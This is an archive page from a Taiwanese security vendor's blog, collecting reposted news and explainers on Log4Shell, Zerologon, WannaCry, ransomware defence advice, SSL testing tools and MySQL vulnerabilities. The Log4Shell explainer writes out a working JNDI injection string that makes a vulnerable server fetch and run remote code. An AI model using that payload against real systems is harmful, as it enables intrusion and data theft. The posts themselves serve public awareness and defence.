其他漏洞 | 捕夢網 Blog

出事了阿伯!!Google緊急修補Chrome一個已有攻擊程式的漏洞

pumoadmin55 — Tue, 26 Apr 2022 06:29:31 +0000

文章出處

https://www.ithome.com.tw/news/150434

Emergency Security Update For 3.2 Billion Google Chrome Users—Attacks Underway

https://www.forbes.com/sites/daveywinder/2022/04/17/emergency-security-update-for-32-billion-google-chrome-users-attacks-underway/?sh=65bfff5136a5

The post 出事了阿伯!!Google緊急修補Chrome一個已有攻擊程式的漏洞 first appeared on 捕夢網 Blog.

從監視攝影機理解Log4j跟Log4Shell嚴重漏洞

pumoadmin55 — Thu, 23 Dec 2021 07:17:47 +0000

2021 年末資安界最大的新聞莫過於 Log4j 的漏洞，編號為 CVE-2021-44228，又被稱為 Log4Shell，甚至被一些人形容為「核彈級漏洞」，可見這個漏洞的影響程度之深遠。

關於技術上的分析已經有很多篇文章在講解了，但對於不懂技術的人來說，可能只知道這個漏洞很嚴重，卻不知道為什麼嚴重，也不知道原理到底是什麼，因此我想從讓非技術背景的人也能理解的角度出發，寫一篇比較白話的文章。

從監視攝影機談起

我有個朋友叫小明，他家是開雜貨店的。就跟其他商店一樣，在店裡有一支監視攝影機，怕有什麼消費糾紛或是有人來搶劫或偷東西，因此讓攝影機 24 小時全程錄影，真的發生什麼事了，就會有證據留存下來。

但攝影機的鏡頭角度有限，不可能把整間店面的影像都拍下來，就算真的都拍下來了，要存的資料也會太多（除非小明很有錢，買了一堆攝影機）。因此，攝影機只會對準一些非常重要、值得記錄下來的地方，像是收銀台等等。

原本這支攝影機用了十幾年都沒什麼事情，畢竟不就是把影像記錄起來嗎，能有什麼事情？但最近卻突然有人發現一個攝影機的隱藏功能（嚴格來講不是隱藏功能，因為攝影機的說明書上其實有提到，可是大家都懶得看那一百多頁的說明書，所以很少人知道這個功能）。

這個功能是什麼呢？那就是除了錄影以外，這台監視攝影機還有個智慧圖片辨識的功能，如果它看到特定的影像，會根據影像的內容去執行相對應的動作。舉例來說好了，這個圖片辨識功能需要把指令寫在 100×100 的板子上，一定要黑底白字加上特定格式，像這個樣子：

當攝影機看到上面的圖，符合特定格式，就執行了上面的指令：「關機」，就真的關機了！但關機還沒什麼，指令還可以寫說「把攝影機資料全都給我」之類的，再者，攝影機本來就會即時連線到其他伺服器，這個指令也可以對那些伺服器做操作，例如說把上面的資料全都偷下來等等。

總之呢，一旦讓攝影機拍到指定格式的東西，就會幫你執行指令。

這個功能被爆出來以後，血流成河，因為太多地方都有監視攝影機了，因此許多人都帶著這個板子去看看會不會觸發這個功能。攝影機有分型號，只有一台叫做 log4j 的攝影機會出事，其他不會，但要注意的事情是有些攝影機它雖然不叫做這名字，可其實是從 log4j 作為基底改出來的，就一樣會出事。

而有些東西儘管不是攝影機也會出事，例如說有台智慧冰箱，號稱內部有微型攝影機可以即時監控冰箱內部狀況，恰巧這個微型攝影機就是 log4j 這個型號的攝影機改版出來的，所以也有同樣的問題。

你想想看，如果監視攝影機出了這個問題，那全台灣、全世界這麼多人用這個型號的監視攝影機，當然會引起軒然大波，只要讓攝影機拍到特定的東西就會執行指令，這可嚴重了。

以上是對於 log4j 漏洞的簡單比喻，在這個故事中雜貨店就像是你的網站，而攝影機的功能就是拿來紀錄（log）對於網站的那些請求（request），整個故事只要記兩個重點就好：

log4j 是拿來記錄東西用的
漏洞原理是只要紀錄某些特定格式的文字，就會觸發一個功能可以執行程式碼

白話的簡易比喻到這邊先結束，想要更了解 log4j，我們就必須先來看看什麼是 log。

有關於 log 這件事

log 的中文翻譯叫做日誌，我相信許多人對這個名詞並不陌生，如果你有跟工程師合作過，他在解決問題時可能會說：「我去看一下 log」；或是如果你們跟合作廠商各執一詞，他說 A 你們說 B，這時候就會說：「不然看一下 log 吧，看看是誰的問題」

當你跟公司的 IT 合作解決電腦上的小問題時，他也會跟你說要去某個地方複製 log 給他，他才知道發生了什麼事情。

log 就像是一台 24 小時全年無休的監視攝影機一樣，需要紀錄起重要事物的狀況。

那為什麼需要有 log 呢？這問題就像是「為什麼要有監視攝影機？」一樣，答案很簡單，因為出事的時候才有證據。就像行車記錄器一樣，裝了以後若不幸發生車禍，就可以協助判斷肇責。

舉個例子，假設我是 A 公司，我們公司是做購物網站的，而通常金流這一塊並不會自己做，而是會找其他做金流的廠商合作，在後端去「串接」金流服務商提供的功能，講白話一點就是：「當使用者要付款時，我把使用者導過去金流廠商的頁面，付款完再導回來我們網站」，相信有在網路上購物的大家應該很熟悉這個流程。

在這個過程中，雙方都必須留下紀錄，確保未來發生問題時有證據可以輔助說明。

例如說有天 A 公司突然接到一堆客訴說沒辦法付款，這時 A 公司直接打電話去金流商，罵說你們這什麼爛服務，怎麼突然壞掉，而金流商此時提供了伺服器的 log，說：「沒有啊，我們這邊從今天早上八點開始就沒有你們導過來的紀錄了，應該是你們的問題吧？」，後來 A 公司檢查了自己這邊的服務，確實是因為今天早上的版本更新出了問題而導致，跟金流商一點關係都沒有。

這就是 log 的重要性，當出事的時候你才有證據可以盤查，才能盡可能還原當初的狀況。

做開發者的大家都知道 log 很重要，所以 log 基本上是必備的，以網站後端來說，他可能會在交易發生錯誤時留下一筆 log，也有可能在發生非預期錯誤時寫下 log，或是用 log 紀錄 request 中的一些欄位，比如說瀏覽器版本好了，給自己公司內部的數據分析系統來使用。

因此 log 是個十分常見的功能。這也是為什麼如果這個功能出事了，造成的後果會非常嚴重。

Log4j 是什麼？

在寫網站後端的程式碼時，會有不同的程式語言可以選擇，例如說 Python、JavaScript、PHP 或是 Java 等等，而這些程式語言都會有些專門做 log 的套件，簡單來說就是有人已經幫你把功能都寫好了，你只要用就好了。

而 Java 有一個很好用的 log 套件，就叫做 log4j。而這個套件是隸屬於 Apache 軟體基金會底下，因此全名又叫做 Apache Log4j。

Apache 底下有很多不同的軟體跟套件，例如說：

Apache HTTP Server（最常看到的是這個）
Apache Cassandra
Apache Tomcat
Apache Hadoop
Apache Struts
…

所以 Apache Server 跟 Apache log4j 完全是不同的兩個東西，我知道你用 Apache Server，跟你有沒有用 log4j 是兩件事情。

這次出問題的套件就是 log4j，而出問題的原因跟我開頭講的一樣，有一個鮮為人知的功能有著安全性的漏洞，只要 log4j 在記錄 log 時記錄到某個特定格式的東西，就會去執行相對應的程式碼，就像開頭提的那個「關機」的板板一樣。

再講更詳細一點，其實並不是直接執行程式碼，那一段特定格式長得像這樣：

${jndi:ldap://cymetrics.io/test}

先不要管那些你看不懂的字，你可以很明顯看到裡面有一段東西很像網址，對，它就是網址，當 log4j 紀錄上面那一串字的時候，它發現這串字符合特定格式，就會去裡面的網址（cymetrics.io/test）下載程式碼然後執行，因此這是一個 RCE（Remote Code Execution，遠端程式碼執行）漏洞。

前面我有提過後端會記錄許多東西，假設今天有個後端服務是用 Java 寫的，而它用 log4j 記錄了使用者登入失敗時輸入的帳號，這時我只要用 ${jndi:ldap://cymetrics.io/test} 這個帳號登入，就能夠觸發 log4j 的漏洞，讓它執行我準備好的程式碼。

只要能執行程式碼，我就可以做很多事情，例如說把伺服器上的資料偷走，或是安裝挖礦軟體幫我挖礦等等。

為什麼這個漏洞如此嚴重？

第一，log4j 這個套件使用的人數極多，只要你有用 Java，幾乎都會用這個套件來紀錄 log；

第二，觸發方式容易，你只要在 request 的各個地方塞滿這些有問題的字串，server 只要有記錄下來其中一個，就能夠觸發漏洞，而前面我們有提到紀錄 log 本來就是家常便飯的事情；

第三，能造成的影響極大，漏洞被觸發之後就是最嚴重的 RCE，可以直接執行任意程式碼。

結合以上這三點，讓它成了一個核彈級的漏洞。到底有多嚴重，看看這些新聞標題就知道：

有許多其他的軟體也都用了 log4j 這個套件，因此也會有問題，國外整理出一份被影響的清單：Log4Shell log4j vulnerability (CVE-2021-44228 / CVE-2021-45046) – cheat-sheet reference guide，像是 Minecraft 這個遊戲的伺服器也有用到 log4j，所以也被這個漏洞給影響。

該怎麼知道我有沒有被這個漏洞影響？

可以先確認自己家的程式有沒有用到 log4j 這個套件以及套件的版本，也需要一併檢查有沒有使用被log4j 影響的其他軟體。

如果你是工程師，也可以用一些現有的工具檢測是否受到漏洞影響，像是：log4j-scan 或是 jfrog 提供的 log4j-tools 等等。

該如何修補？

由瑞士 CERT 發表的這篇文章：Zero-Day Exploit Targeting Popular Java Library Log4j 中，有給了一張從各個環節去防禦的圖：

如果來不及把根本原因修掉，可以先上 WAF（Web Application Firewall），簡單來說就是針對網站的防火牆，把那些惡意的字串擋掉，例如說 Cloudflare 就在第一時間增加了 WAF 的規則加以阻擋，不過也有很多人在研究怎麼繞過 WAF 的規則，因此這是治標不治本的做法。

治本的方法就是把 log4j 停用或是升版，升級到不會被這個漏洞影響的版本，但有些時候第一時間的改版可能沒有把漏洞完全補掉，因此記得更新完以後還是要密切注意是否有更新的版本。例如說在這篇文章寫完後過沒多久，官方就釋出了第三個 patch 修復其他相關問題：Apache Issues 3rd Patch to Fix New High-Severity Log4j Vulnerability。

文章引用/轉載出處

資安人從監視攝影機理解 Log4j 跟 Log4Shell 漏洞

https://www.informationsecurity.com.tw/article/article_detail.aspx?aid=9631

https://tech-blog.cymetrics.io/posts/huli/what-is-log4j-and-log4shell/

The post 從監視攝影機理解Log4j跟Log4Shell嚴重漏洞 first appeared on 捕夢網 Blog.

美國政府給企業/組織對抗勒索病毒威脅的建議措施

pumoadmin55 — Tue, 15 Jun 2021 03:18:58 +0000

日前美國政府發表一封給美國企業的信，信件中提到勒索病毒對世界造成的嚴重影響，給予企業/組織五項建議措施，協助對抗勒索病毒的威脅。

信件內容沒有高深艱澀的專有名詞，取而代之是簡單的建議。讓看這封信的人都可以明白政府給予的建議。

我們說網路無國界，勒索病毒也是一樣。不會說在台灣就不會遭受勒索病毒的攻擊。

捕夢網在看完這封信之後，簡單扼要地將這封美國政府給企業/組織的建議信翻成中文，並將文中建議標註出來，方便閱讀。

=====以下為信件內容=====

信件主旨：對抗勒索病毒威脅的建議措施

勒索病毒攻擊的件數和規模明顯增加，加強國家整體抵禦網路攻擊的能力—無論是企業/組織或公共部門—是總統的首要任務。

在拜登總統的領導下，聯邦政府正在加緊腳步，與世界各地志同道合的合作夥伴合作，以阻止勒索病毒的駭客。這些努力包括破壞勒索病毒網路、與國際合作夥伴合作以追究勒索病毒參與者的責任、制定連貫一致的贖金支付政策以及實現對虛擬貨幣收益的快速追踪和攔截。

企業/組織也負有防止這些威脅的重要責任。企業/組織必須認知說，不論企業/組織規模或所在位置，所有企業/組織都有可能成為勒索病毒的目標。但是，您可以立即採取措施保護自己、客戶和更廣泛的經濟範圍。就像房子有防盜鎖和警報系統，辦公大樓有警衛和保全來應付小偷竊賊，我們建議您認真正視勒索病毒的犯罪，確保您的企業/組織的網路資安足以因應這些威脅。

最近針對美國、愛爾蘭、德國和世界各地其他組織的一連串勒索病毒攻擊中，能反應出最重要的一點是，將勒索病毒視為對核心業務營運的威脅，而非簡單的資料竊取的公司，都能快速做出反應並有效率地從災後恢復。為了解潛在風險，負責主管應立即召集團隊，討論勒索病毒威脅，檢視企業資安狀況和業務連續性計劃，以確保企業/組織有能力繼續或快速恢復營運。

下方詳列美國政府的建議措施—挑選了簡單扼要有效的方法，以幫助企業/組織快速降低資安風險。

我們建議您採取以下措施:

採取總統行政命令的五大措施：
聯邦政府迅速確實地落實拜登總統簽署的《改善國家網路安全行政命令》。我們以身作則，因為這五大措施影響很大：多重身份驗證（因為密碼本身經常被洩露）、端點檢測和回應（尋找網路上的惡意活動並阻止）、資料加密（如果資料被竊取，將無法被駭客利用）和一個經驗老道、經過授權的安全團隊（快速修補漏洞，整合並共享資安防禦中的風險訊息）。以上這些措施將明顯降低網路攻擊成功的風險。

1.備份您的資料、系統映像檔和配置，定期進行測試，保持備份離線：
確保定期測試備份資料，並確保未連接至網路。因為許多勒索病毒企圖尋找、加密或刪除可存取的備份資料。保持您的備份資料離線非常重要，因為如果您的網路資料被勒索病毒加密時，您的企業/組織即可利用備份資料恢復系統。

2.及時更新和修補系統：
包括及時維護作業系統、應用程式和韌體的安全性。考慮使用中央控管的修補管理系統；使用基於風險的評估策略來推行您的修補管理計劃。

3.測試網路安全事件應變計劃：
進行測試是找出現實與計劃之間差異的最好方法。測試企業/組織的核心安全問題，根據這些問題制定您的安全事件應變計劃。例如，企業/組織能否可以在無法存取特定系統的情況下維持運作？可以維持多久？如果帳務系統無法使用，是否就此關閉生產業務嗎？

4.檢查您的安全團隊工作：
使用第三方滲透測試來檢測系統的安全性以及抵禦複雜攻擊的能力。許多利用勒索病毒的駭客極具侵略性以及經驗老道，在他們眼中，您等於敞開大門歡迎他們上門。

5.分隔您的營運網路：
勒索病毒攻擊最近發生了變化—從竊取資料到破壞操作。最重要的是，企業/組織的業務和製造/生產營運必須分開，篩選和限制對於營運網路的存取權限，識別營運網路之間的連結。當企業/組織的營運網路遭到入侵，製定應變流程或轉為人工控制，確保核心網路功能可以被隔離的情況下繼續營運。定期測試應變計劃，例如可以轉為人工控制，以便在網路安全事件期間，確保關鍵功能維持安全無虞。

勒索病毒攻擊已經嚴重擾亂了世界各地的企業/組織，從愛爾蘭、德國和法國的醫院，到美國的輸油管線、英國的銀行。威脅十分嚴重而且持續增加。我們建議您採取上述關鍵措施，來保護您的企業/組織和美國大眾。美國政府正在與世界各國合作，追究勒索病毒的參與組織和包庇他們的國家的責任。但我們無法單獨對抗勒索病毒帶來的威脅，私人企業/組織肩負著明確關鍵的責任。聯邦政府隨時準備幫助您採取上述措施。

原文來源

其他參考資訊:

FACT SHEET: President Signs Executive Order Charting New Course to Improve the Nation’s Cybersecurity and Protect Federal Government Networks

RANSOMWARE GUIDANCE AND RESOURCES

The post 美國政府給企業/組織對抗勒索病毒威脅的建議措施 first appeared on 捕夢網 Blog.

台灣大9萬支手機遭植入惡意程式，官方：全面召回、協助軟體升級

pumoadmin55 — Thu, 07 Jan 2021 06:04:57 +0000

台灣大自有品牌手機AMAZING A32有資安疑慮，NCC發現手機製程中被暗中植入惡意程式，台灣大哥大回應，將與生產廠商力平國際合作，全面召回進行安全性軟體升級。

國家通訊傳播委員會（NCC）今天表示，日前接獲刑事警察局情資，發現AMAZING A32手機製程中被暗中植入惡意程式，民眾購買、使用手機時，詐騙集團可利用該手機門號向遊戲公司申請遊戲帳號，恐讓不知情的手機使用者變成詐騙集團的人頭。

台灣大哥大今天發布新聞稿說明，公司接獲合作廠商「力平國際公司」通知，由其負責生產製造的Amazing A32手機，因強化資安防護，必須全面召回進行安全性軟體升級；台灣大接獲通報後，承諾將與「力平國際公司」充分合作，全力協助用戶將手機作業系統升級至最新V2.0版本。

台灣大指出，這次Amazing A32手機所升級的軟體採用最新V2.0版，經送請全國認證基金會（TAF）認證的國家級資安測試實驗室，財團法人電信技術中心（TTC）執行檢測，已確認符合台灣資通產業標準協會（TAICS）所公布的「智慧型手機系統內建軟體資安標準」及「智慧型手機系統內建軟體資安測試規範」資安檢測項目，已無資安疑慮。

圖片來源: 截圖自台灣大哥大

台灣大表示，即日起客戶可透過公司網站下載V2.0版更新程式，或可前往台灣大各直營門市、8日起可至加盟門市辦理，由專人協助進行系統程式更新。

NCC表示，截至2020年12月20日止，台灣大哥大仍使用該款手機用戶約7600人，已要求台灣大儘速釐清原因，進行善後補救。

台灣大強調，堅持產品安全與服務品質是台灣大奉行的信念與價值，這次配合力平國際召回Amazing A32手機進行軟體升級以強化資安防護，公司除嚴肅以對，也將與「力平國際」充分合作，全力協助客戶進行後續事宜。

強化資安做好防護不可少

參考更多捕夢網端點保護

轉載文章自 :數位時代 https://www.bnext.com.tw/article/60843/taiwan-mobile

首圖來源：Flickr/Blogtrepreneur CC BY 2.0

The post 台灣大9萬支手機遭植入惡意程式，官方：全面召回、協助軟體升級 first appeared on 捕夢網 Blog.

為何發生Zerologon漏洞？軟體實作不當

pumoadmin55 — Thu, 22 Oct 2020 10:00:19 +0000

在今年9月，有研究人員揭露了Zerologon漏洞，引發關注，這是微軟在8月的修補，是關於Windows Netlogon遠端協定的漏洞。

其實，微軟當時已經指出，此漏洞的CVSS 3.0風險達到滿分10分，並表示與網域控制器（Domain Controller）有關，不過，隨著研究人員的揭露，指出該漏洞可讓駭客輕易掌控AD網域，並解釋漏洞成因，不僅再次引發外界對此漏洞的重視，同時，相關的修補說明與警示也不斷成為新聞焦點。

這個已經使用多年的協定到底有何問題？我們根據首度揭露這項漏洞的資安公司Secura的資安報告，同時也請臺灣資安業者奧義智慧協助，深入說明這次漏洞的細節、根因與利用方式。

漏洞在Netlogon認證交握過程

關於這次Netlogon遠端協定漏洞的成因，我們先從協定運作原理開始說起。

簡單來說，Windows Netlogon遠端協定是一個RPC（Remote Procedure Call）介面，作用於AD網域控制器與Windows網域中電腦之間。舉例來說，以NTLM協定將使用者登入伺服器，就是它的功能之一，其他還包括讓網域內的電腦，以及網域控制器，可以相互驗證身分，特別是還可更新網域中電腦的密碼。

從原理來看，依據Windows Netlogon遠端協定，當用戶端（已加入網域的電腦）連至伺服器端（網域控制器）時，必須先經過認證交握（Authentication handshake）的過程。在此階段中，第一步驟是由用戶端開始，會先傳送一個Client Challenge，然後第二步驟是伺服器端也傳送回一個Server Challenge，此時，將透過一個金鑰衍生函式KDF（Key Derivation Function），以便相互確認彼此，並產生後續通訊都可用於驗證的Session Key。

第三步驟，同時也就是這次漏洞發生的地方。在用戶端通知產生Session Key時，該Session Key將包含secret與Challenge，secret是帳號密碼，並會將前述的Client Challenge加密，當傳送至伺服器端時，加密的結果就會被放入NetrServerAuthentication3的credential參數中，提供給Server進行確認。

一般而言，也就是在沒有漏洞的情況下，攻擊者在此情境中，由於不知道密碼，就無法計算出Session Key，也無法成功算出Client Credential。但是，攻擊者若是不知道Session Key，卻有辦法計算出Client Credential，等於成功繞過這裡的身分驗證。而這次的漏洞，就是這裡的加密過程中，沒有正確使用AES-CFB8加密模式而導致。

從軟體開發的角度來看，這次漏洞突顯了什麼樣的問題？是因為AES-CFB8不夠安全？還是軟體實作上出了什麼問題？

奧義智慧資深研究員陳仲寬的看法是，這個漏洞首先顯示出軟體在安全性及效能上的權衡。他認為，AES-CFB8是一個針對效能的變種演算法，雖常用於實務上，但並未仔細地接受理論上的分析驗證，儘管也沒有人證明其不安全。

而這個漏洞最主要的重點，就是沒有正確實作AES-CFB8加密模式，違反IV數值應為隨機數值。因為在此實作上，將AES-CFB8成立所需要的一項安全屬性- IV數值，寫死為一連串的0，造成當攻擊者將前述Client challenge同樣設定成一連串0時，造成連鎖效應，就有相當高的機率（1/256），導致得到的運算結果也是一連串0。

也因此，攻擊者能夠利用Zerologon漏洞偽造身分，與網域控制站溝通，並且有很高的機率，可以向伺服器端驗證自己的身分，之後，將能藉由Netlogon協定中內建的設定密碼功能，更改網域控制站的電腦帳號與密碼，再以DCSync等攻擊方式，進而控制整個網域。

對此，陳仲寬推測，實作此部分軟體的人，可能並不熟悉密碼學，也沒有深入去探討固定IV的風險，因此造成此次漏洞。他認為，即使是一般程式設計師，也需要有基本資安的概念。

資料來源: iThome 為何發生Zerologon漏洞？軟體實作不當 https://www.ithome.com.tw/news/140582

The post 為何發生Zerologon漏洞？軟體實作不當 first appeared on 捕夢網 Blog.

驗證SSL憑證是否有正確安裝？是否有漏洞？

pumoadmin55 — Mon, 30 Dec 2019 03:34:42 +0000

如何驗證SSL憑證是否有正確安裝？是否有漏洞？

這幾年來，幾家科技大廠包含Google等在內，致力於推動為網站安裝SSL，作為資訊安全的第一步。

SSL憑證是否有正確安裝？是否有漏洞？當然如果您的憑證是由專業的工程師或主機商協助安裝，那基本是安全無虞的

捕夢網接下來要介紹幾個網站，只需輸入網站，即可幫您驗證SSL憑證是否有正確安裝？是否有漏洞？

1. SSL Labs

SSL Labs by Qualys is one of the most popular SSL testing tools to check all latest vulnerability & misconfiguration. Ex:

SSL Labs為目前最常被使用用來檢測SSL憑證的網站之一

2. SSL Checker

SSL Checker let you quickly identify if a chain certificate is implemented correctly. Great idea to proactively test after SSL cert implementation to ensure chain certificate is not broken.

SSL Checker可以快速確認Chain Certificate是否安裝正確

3. Geekflare

Geekflare提供兩種檢測工具

TLS Test – quickly find out which TLS protocol version is supported. As you can see, the tool is capable of testing the latest TLS 1.3 as well.

TLS Test是用來檢測TLS protocol是否太舊或不安全的用的

TLS Scanner – detailed testing to find out the common misconfiguration and vulnerabilities.

TLS Scanner則可以詳細檢測常見的設定錯誤或是漏洞是否存在

4. Wormly

Web Server Tester by Wormly check for more than 65 metrics and give you a status of each including overall scores. The report contains certificate overview (CN, Expiry details, Trust chain), Encryption Ciphers details, Public key size, Secure Renegotiation, Protocols like SSLv3/v2, TLSv1/1.2.

Wormly涵跨了65種檢測指標，會針對網站整體狀態給出評價

5. DigiCert

DigiCert SSL Installation Diagnostics Tool is another fantastic tool to provide you DNS resolves IP address, Certificate details including Issuer, Serial number, key length, signature algorithm, SSL cipher supported by the server and expiry details.

DigiCert可以提供DNS IP解析，還包含憑證發行者，金鑰，簽章等

6. SSL Server Security Test

Useful tool by High-Tech Bridge to perform scan against your https URL and provide in-depth technical information with an option to download the report in PDF format.

SSL Server Security Test讓您可以下載檢測報告，仔細檢測哪裡是否需要改善

7. Observatory

Observatory by Mozilla checks various metrics like TLS cipher details, certificate details, OWASP recommended secure headers, and more.

Observatory則是由火狐瀏覽器開發公司所提供的檢測工具

8. CryptCheck

CryptCheck quickly scans the given site and show score for protocol, key exchange, and cipher. You get detailed cipher suites details so can be handy if you are troubleshooting or validating ciphers.

CryptCheck則會告訴你關於套件的詳細訊息，那讓您在修正錯誤更加快速

資料參考來源: https://geekflare.com/ssl-test-certificate/#SSL-Server-Security-Test

The post 驗證SSL憑證是否有正確安裝？是否有漏洞？ first appeared on 捕夢網 Blog.

WannaCry 勒索病毒預警

pumoadmin55 — Fri, 19 May 2017 01:55:08 +0000

WannaCry 勒索軟體於 2017 年 5 月橫掃全球。瞭解此勒索軟體的攻擊如何蔓延，以及如何保護您的網路以避免類似的攻擊。

更新時間：2017 年 5 月 15 日格林威治標準時間 23:24:21：

賽門鐵克已發現兩個可能的連結與 WannaCry 勒索軟體攻擊及 Lazarus 駭客集團有些關聯：

已知的 Lazarus 工具與 WannaCry 勒索軟體同時發生：賽門鐵克在已感染早期版本 WannaCry 的電腦上，發現 Lazarus 獨家使用的工具。這些早期版本的 WannaCry 不具備透過 SMB 散播的能力。Lazarus 工具可能已被用來做為散播 WannaCry 的方法，但尚未證實。
共用的程式碼：Google 的 Neel Mehta 在發佈的推文中表示，已知的 Lazarus 工具與 WannaCry 勒索軟體兩者有共用的程式碼。賽門鐵克判斷此共用的程式碼是 SSL 的形式。此 SSL 實作使用特定序列的 75 個密碼，目前為止只有在 Lazarus 工具 (包括 Contopee 與 Brambul) 以及 WannaCry 版本上發現過這段密碼。

雖然上述發現並不表示 Lazarus 與 WannaCry 之間有明確的關聯，當我們認為其相關性有必要進一步調查。如有任何進展，我們將持續分享研究結果。

自 5 月 12 日週五起，一種名為 WannaCry (Ransom.Wannacry) 的新種強烈病毒已襲擊全球數十萬部電腦。WannaCry 比其他常見的勒索軟體類型更加危險，因為它可藉由入侵已安裝微軟 2017 年 3 月修補程式 (MS17-010) 的電腦，將病毒散播至企業組織內部的網路。在四月由名為 Shadow Brokers 的集團進行一連串的資料外洩中，最新一波的釋出資料包含上述名為「Eternal Blue」的安全漏洞，該集團宣稱他們已從 Equation 網路間諜集團竊取資料。

我是否已受到保護以避免遭受 WannaCry 勒索軟體攻擊？

透過結合多項技術，可自動保護免於遭受 WannaCry 病毒的攻擊。

主動保護由以下技術提供：

IPS 網路保護
SONAR 行為偵測技術
先進機器學習
智慧威脅雲端

網路保護
賽門鐵克具備以下 IPS 保護以封鎖嘗試利用 MS17-010 安全漏洞進行的入侵行為：

作業系統攻擊：Microsoft SMB MS17-010 入侵嘗試 (2017 年 5 月 2 日發佈)
攻擊：Shellcode 下載活動 (2017 年 4 月 24 日發佈)

SONAR 行為偵測技術

Sapient 機器學習

Heur.AdvML.A
Heur.AdvML.B
Heur.AdvML.D

防毒

為擴大保護與識別的目的，已更新以下防毒識別碼：

客戶應執行 LiveUpdate 並檢查是否已安裝以下定義版本或更新的版本，以確保擁有最新的保護：

20170512.009

以下 IPS 識別碼亦可封鎖與 Ransom.Wannacry 相關的活動：

系統感染：Ransom.Ransom32 Activity

企業組織亦必須確定已安裝最新的 Windows 安全更新以避免病毒擴散，特別是 MS17-010。

什麼是 WannaCry 勒索軟體？

WannaCry 會搜尋並加密 176 種檔案類型，然後在檔案結尾加上 .WCRY。它要求使用者支付相當於 $300 美元的比特幣贖金。勒索說明表示，贖款金額在三天後將加倍。若未在 7 天內支付贖金，將會刪除已加密的檔案。

我能夠恢復被加密的檔案嗎？或者我應該支付贖金？

目前尚無法將加密檔案解密。如果被感染的檔案有備份，您可以還原這些檔案。賽門鐵克不建議支付贖金。

在某些情況下，沒有備份也能恢復檔案。儲存於桌面、我的文件或遠端磁碟機上的檔案將被加密，原始檔案將被抹除。這是無法恢復的。儲存於電腦上的其他檔案將被加密，而原始檔案將直接被刪除。這表示可以使用取消刪除的工具恢復這些檔案。

WannaCry 是何時出現的？其散播速度有多快？

WannaCry 於 5 月 12 日週五首次出現。賽門鐵克觀察到從格林威治標準時間 8 點開始，WannaCry 嘗試利用 Windows 安全漏洞進行入侵的次數快速增加。賽門鐵克封鎖的嘗試入侵次數在週六日稍微下降，但仍相當高。

圖 1. 賽門鐵克每小時封鎖 WannaCry 嘗試利用 Windows 安全漏洞入侵的次數

圖 2. 賽門鐵克每天封鎖 WannaCry 嘗試利用 Windows 安全漏洞入侵的次數

圖 3. 熱圖顯示賽門鐵克偵測到的 WannaCry，5 月 11 日至 5 月 15 日

誰會受到影響？

任何未更新的 Windows 電腦都有可能遭到 WannaCry 的攻擊。企業組織的風險特別高，因為它能透過網路散播，而且全球已有多家企業組織遭到感染，其中大多位於歐洲。但是，個人也可能受到感染。

這是鎖定目標的攻擊嗎？

不是，目前認為它並非鎖定目標的攻擊。勒索軟體活動通常是不分對象的。

為何它對企業組織造成如此多的問題？

WannaCry 利用已知的 Microsoft Windows 安全漏洞，無需使用者介入即可透過企業網路進行散播。未更新 Windows 最新安全修補程式的電腦皆有感染的風險。

WannaCry 如何散播？

雖然 WannaCry 可藉由入侵安全漏洞而在企業組織內部網路上散播，但是一開始的感染方式，也就是企業組織中第一台電腦遭到感染的方式，仍未確定。賽門鐵克已發現多起 WannaCry 存放於惡意網站上的案例，但這顯然是模仿的攻擊行為，與原始攻擊事件無關。

是否已有許多人支付贖金？

分析攻擊者提供的三個支付贖金用的比特幣位址後顯示，在撰寫本文時，已有 207 筆獨立交易，總計支付 31.21 比特幣 (53,845 美元)。

保護免受勒索軟體的最佳實踐方式是什麼？

新的變種勒索會不定期出現。始終保持安全軟體是最新的，以保護自己免受危害。
保持操作系統和其他軟體更新。軟體更新經常包括可能被勒索攻擊者利用新發現的安全漏洞補丁。這些漏洞可能被勒索攻擊者利用。
賽門鐵克發現,電子郵件是主要傳染方式之一。特別留意不預期的電子郵件，尤其是email中包含的連結和/或附件。
使用者需要特別謹慎對待那些建議啟用巨集以查看附件的Microsoft Office子郵件。除非對來源有絕對的把握,否則請立即刪除來源不明的電子郵件,並且務必不要啟動巨集功能。
備份重要數據是打擊勒索攻擊最有效方法。攻擊者通過加密有價值的文件並使其無法使用，從而向被害者勒索。如果被勒索者有備份副本，一旦感染被清理乾淨，我們就可以恢復文件。但是，企業組織應該確保備份被適當地保護或存儲在離線狀態，以便攻擊者不能刪除它們。
使用雲端服務可以減輕勒索病毒的影響，因為受害者可以透過雲端備份，取回未加密的文件。

文章來源: https://goo.gl/dDfEMb

圖片來源:

The post WannaCry 勒索病毒預警 first appeared on 捕夢網 Blog.

MySQL爆最高權限漏洞，MariaDB、PerconaDB受累

pumoadmin55 — Fri, 04 Nov 2016 02:01:01 +0000

資安研究人員Dawid Golunski周二（11/1）揭露了兩個攸關MySQL開放源碼資料庫的安全漏洞，將允許駭客取得系統最高權限，同時也殃及了基於MySQL的MariaDB與PerconaDB。

相關的漏洞編號分別為CVE-2016-6664與CVE-2016-5617，前者屬重大風險漏洞，後者則是高度（High）風險漏洞，都屬權限擴張漏洞，皆影響MySQL 5.5.51、MySQL 5.6.32及MySQL 5.7.14及之前的版本，以及基於這些版本的MariaDB與PerconaDB。

其中的CVE-2016-6664漏洞允許已存取資料庫的本地端系統使用者擴大權限，成為資料庫系統使用者，藉以存取伺服器上的所有資料庫，若再輔以CVE-2016-5617或其他的權限擴張漏洞，還可進一步成為根系統使用者，等於全面入侵了伺服器。

Golunski已打造出同時開採CVE-2016-6664與CVE-2016-5617的概念性攻擊程式，讓駭客即刻間取得系統最高權限，該程式還可搭配CVE-2016-6663或CVE-2016-5616等漏洞使用。

目前包括MySQL與PerconaDB都已修補上述兩個漏洞，MariaDB則計畫在下一次更新中修補。

文章來源: http://www.ithome.com.tw/news/109383

圖片來源: https://pixabay.com/

The post MySQL爆最高權限漏洞，MariaDB、PerconaDB受累 first appeared on 捕夢網 Blog.

勒索病毒的攻擊媒介了無新意,為何能繞過傳統的安全解決方案?

pumoadmin55 — Mon, 11 Jul 2016 03:03:45 +0000

為何使用者會自己動手啟用內嵌在惡意附件文件內的巨集?
為何 CryptoWall 偏好早上5點到9點間發釣魚信； TorrentLocker喜歡在下午1點到7點間發信
為何勒索病毒發送的網路釣魚發信不用殭屍網路,而改用被駭郵件伺服器?
新聞網站,雲端服務如何成為勒索病毒散播溫床?
為何勒索病毒設定惡意網域存活期間僅一小時?

勒索病毒過去半年變種數量超過過去兩年

